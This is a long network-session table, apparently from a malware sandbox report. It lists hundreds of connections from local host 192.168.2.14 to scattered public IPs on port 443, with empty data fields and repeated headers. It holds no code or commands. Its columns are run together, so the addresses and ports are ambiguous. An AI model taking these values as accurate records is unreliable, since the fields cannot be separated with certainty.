                                      19852192.168.2.145468445.63.254.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19853192.168.2.1439796213.103.222.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19854192.168.2.1438802171.98.145.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19855192.168.2.1438738204.198.231.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19856192.168.2.1459688113.208.140.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19857192.168.2.1441942216.54.7.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19858192.168.2.1450880103.76.128.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19859192.168.2.1443184103.163.227.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19860192.168.2.1451138108.79.148.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19861192.168.2.1439744206.224.218.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19862192.168.2.144263462.89.251.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19863192.168.2.143921248.23.253.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19864192.168.2.1447712172.72.147.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19865192.168.2.145958481.122.57.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19866192.168.2.14518024.164.78.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19867192.168.2.1453670206.160.224.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19868192.168.2.145173893.190.219.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19869192.168.2.1439958134.102.224.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19870192.168.2.145220269.202.96.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19871192.168.2.143698482.65.173.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19872192.168.2.1441348129.73.208.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19873192.168.2.144564693.30.140.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19874192.168.2.1459908137.214.165.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19875192.168.2.145296864.196.193.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19876192.168.2.144732435.187.26.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19877192.168.2.143562043.40.49.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19878192.168.2.146018844.74.91.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19879192.168.2.143973227.209.81.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19880192.168.2.1460824184.179.41.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19881192.168.2.1445552168.148.53.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19882192.168.2.1453374192.220.11.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19883192.168.2.1436032166.213.158.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19884192.168.2.143711025.234.46.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19885192.168.2.144298661.252.64.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19886192.168.2.1456338142.10.172.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19887192.168.2.143467447.157.38.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19888192.168.2.14478464.81.15.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19889192.168.2.144461860.230.138.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19890192.168.2.144606037.118.210.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19891192.168.2.1459782137.175.231.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19892192.168.2.1437066161.213.205.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19893192.168.2.1439370211.127.146.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19894192.168.2.144839625.238.172.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19895192.168.2.1443070135.245.83.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19896192.168.2.144301268.250.144.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19897192.168.2.1435488219.245.107.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19898192.168.2.1450470200.13.145.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19899192.168.2.1447840168.117.81.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19900192.168.2.144647250.139.236.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19901192.168.2.1456834106.165.110.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19902192.168.2.1437810202.114.9.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19903192.168.2.144353853.40.238.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19904192.168.2.1439920124.12.67.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19905192.168.2.1446262217.217.121.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19906192.168.2.1456358111.211.94.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19907192.168.2.1442620166.238.154.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19908192.168.2.144154467.65.114.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19909192.168.2.1433438103.195.103.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19910192.168.2.143651067.225.137.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19911192.168.2.1440810168.238.206.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19912192.168.2.143393419.216.41.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19913192.168.2.1439124170.199.135.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19914192.168.2.1450736213.247.127.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19915192.168.2.1443198185.190.213.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19916192.168.2.1447782139.195.68.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19917192.168.2.1436858107.86.1.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19918192.168.2.144661279.113.6.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19919192.168.2.1448992130.126.181.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19920192.168.2.1439294190.20.127.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19921192.168.2.1452966114.179.130.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19922192.168.2.143435887.153.45.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19923192.168.2.144626864.65.82.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19924192.168.2.144998264.71.100.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19925192.168.2.1453426147.150.65.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19926192.168.2.1443868195.108.195.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19927192.168.2.144299671.226.123.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19928192.168.2.144770493.207.212.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19929192.168.2.1451362130.227.82.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19930192.168.2.1454974141.114.118.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19931192.168.2.1454640157.53.24.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19932192.168.2.1446668110.220.96.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19933192.168.2.146064897.148.167.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19934192.168.2.1439192183.71.209.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19935192.168.2.14528404.135.96.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19936192.168.2.1446504103.169.238.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19937192.168.2.1437652182.205.255.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19938192.168.2.145691261.156.59.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19939192.168.2.1446516212.118.215.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19940192.168.2.143595667.21.128.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19941192.168.2.144622814.55.207.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19942192.168.2.1446946223.169.220.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19943192.168.2.145132214.184.63.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19944192.168.2.1435468123.82.220.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19945192.168.2.1455196110.18.213.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19946192.168.2.145092269.255.130.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19947192.168.2.144451653.181.239.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19948192.168.2.1448762123.18.92.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19949192.168.2.1453664152.72.192.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19950192.168.2.144088275.38.60.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19951192.168.2.1445016100.137.173.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19952192.168.2.1434176176.71.64.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19953192.168.2.143647414.35.145.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19954192.168.2.145319093.105.150.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19955192.168.2.1435634151.196.33.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19956192.168.2.146004078.72.65.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19957192.168.2.143917267.123.118.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19958192.168.2.145689893.38.89.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19959192.168.2.1442514200.108.202.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19960192.168.2.144818258.206.155.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19961192.168.2.145366227.207.192.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19962192.168.2.1458558164.142.113.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19963192.168.2.145119461.19.229.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19964192.168.2.1455736166.137.16.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19965192.168.2.143574857.138.197.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19966192.168.2.144495067.133.137.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19967192.168.2.1446366160.30.152.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19968192.168.2.1456116108.251.89.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19969192.168.2.1437660149.45.10.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19970192.168.2.145849440.199.194.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19971192.168.2.1448980118.251.67.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19972192.168.2.1439906162.70.246.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19973192.168.2.143337649.88.216.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19974192.168.2.1460444130.88.162.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19975192.168.2.1438918130.111.72.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19976192.168.2.1434850103.1.62.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19977192.168.2.145366649.199.125.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19978192.168.2.1437760218.4.55.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19979192.168.2.145193644.118.244.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19980192.168.2.1442722155.237.248.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19981192.168.2.1442146180.145.202.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19982192.168.2.145441251.125.212.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19983192.168.2.1440440148.58.201.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19984192.168.2.1453154129.167.73.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19985192.168.2.1459028182.129.105.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19986192.168.2.1432778187.90.133.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19987192.168.2.1432916193.5.20.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19988192.168.2.1437926190.160.120.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19989192.168.2.145084836.23.66.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19990192.168.2.1460434220.195.40.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19991192.168.2.1458838151.246.192.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19992192.168.2.144275467.3.44.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19993192.168.2.1446984212.78.109.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19994192.168.2.145604447.21.227.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19995192.168.2.14368762.193.18.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19996192.168.2.144663419.109.135.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19997192.168.2.144507449.189.194.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19998192.168.2.1435236108.136.123.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19999192.168.2.1455800133.117.130.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20000192.168.2.145652265.248.132.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20001192.168.2.1458354168.129.207.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20002192.168.2.145823092.215.4.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20003192.168.2.143851032.227.179.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20004192.168.2.14520589.3.190.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20005192.168.2.1435618176.89.5.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20006192.168.2.1449144168.191.187.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20007192.168.2.1435904113.226.100.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20008192.168.2.144467818.27.254.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20009192.168.2.1459698132.164.235.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20010192.168.2.143328017.148.189.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20011192.168.2.144466646.167.166.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20012192.168.2.146065269.100.30.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20013192.168.2.145618080.12.244.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20014192.168.2.145974235.140.229.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20015192.168.2.143459668.247.174.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20016192.168.2.1453534105.218.156.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20017192.168.2.1450470152.217.186.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20018192.168.2.14450925.211.165.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20019192.168.2.1449598165.152.127.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20020192.168.2.1457932201.155.128.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20021192.168.2.1455844129.243.134.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20022192.168.2.1448124105.3.41.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20023192.168.2.144867239.47.217.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20024192.168.2.1439100190.135.207.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20025192.168.2.143431427.76.173.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20026192.168.2.143338245.216.44.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20027192.168.2.1447234183.26.243.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20028192.168.2.1450844109.171.7.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20029192.168.2.144956493.220.31.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20030192.168.2.143724085.173.204.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20031192.168.2.143670877.83.13.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20032192.168.2.1452350181.152.135.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20033192.168.2.1447420154.20.173.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20034192.168.2.143578087.98.47.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20035192.168.2.144360852.4.222.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20036192.168.2.1434924188.96.199.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20037192.168.2.145881235.65.84.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20038192.168.2.145658638.85.191.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20039192.168.2.1443238145.231.20.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20040192.168.2.144937866.29.10.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20041192.168.2.145046076.83.102.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20042192.168.2.145734019.73.176.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20043192.168.2.145159634.117.137.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20044192.168.2.1442300139.55.106.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20045192.168.2.1439704176.33.220.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20046192.168.2.1442852201.144.176.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20047192.168.2.145580665.5.51.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20048192.168.2.145585060.127.186.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20049192.168.2.1455688140.45.186.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20050192.168.2.1458618105.254.194.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20051192.168.2.144871039.230.223.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20052192.168.2.145604474.40.123.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20053192.168.2.144195495.205.70.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20054192.168.2.1454696170.211.156.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20055192.168.2.144064212.200.254.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20056192.168.2.1442554123.226.168.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20057192.168.2.1458872110.158.90.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20058192.168.2.146088294.107.168.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20059192.168.2.144217671.106.243.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20060192.168.2.1440902137.64.239.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20061192.168.2.1442576190.244.55.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20062192.168.2.1437674220.97.52.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20063192.168.2.143988470.127.72.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20064192.168.2.1435540131.197.126.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20065192.168.2.143547073.134.72.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20066192.168.2.1441852181.92.200.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20067192.168.2.1451780141.4.69.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20068192.168.2.144941043.39.236.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20069192.168.2.145211061.64.222.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20070192.168.2.1444102128.189.240.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20071192.168.2.1447548172.211.233.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20072192.168.2.144317844.186.245.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20073192.168.2.143476427.206.75.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
